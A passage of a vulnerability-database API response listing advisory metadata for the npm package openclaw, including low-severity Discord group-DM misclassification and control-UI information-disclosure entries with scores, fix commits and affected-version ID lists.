                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f3h5-h452-vp3j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "GHSA-f3h5-h452-vp3j"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c25h-khws-2fc3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89835?format=api",
            "vulnerability_id": "VCID-c4yt-z48z-zygv",
            "summary": "OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message\n## Summary\nDiscord Component Interaction Misclassifies Group DM as Direct Message\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41341",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.051",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05106",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05121",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41341"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41341",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41341"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6336-qqw9-v6x6",
                    "reference_id": "GHSA-6336-qqw9-v6x6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6336-qqw9-v6x6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41341",
                "GHSA-6336-qqw9-v6x6"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4yt-z48z-zygv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89511?format=api",
            "vulnerability_id": "VCID-c76v-4577-n7c6",
            "summary": "OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability\n## Summary\nOpenClaw Gateway Control Interface Information Disclosure Vulnerability\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00\n\nOpenClaw thanks @topsec-bunney for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41335",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12878",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12844",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12883",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41335"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41335",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41335"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hr8g-2q7x-3f4w",
                    "reference_id": "GHSA-hr8g-2q7x-3f4w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hr8g-2q7x-3f4w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
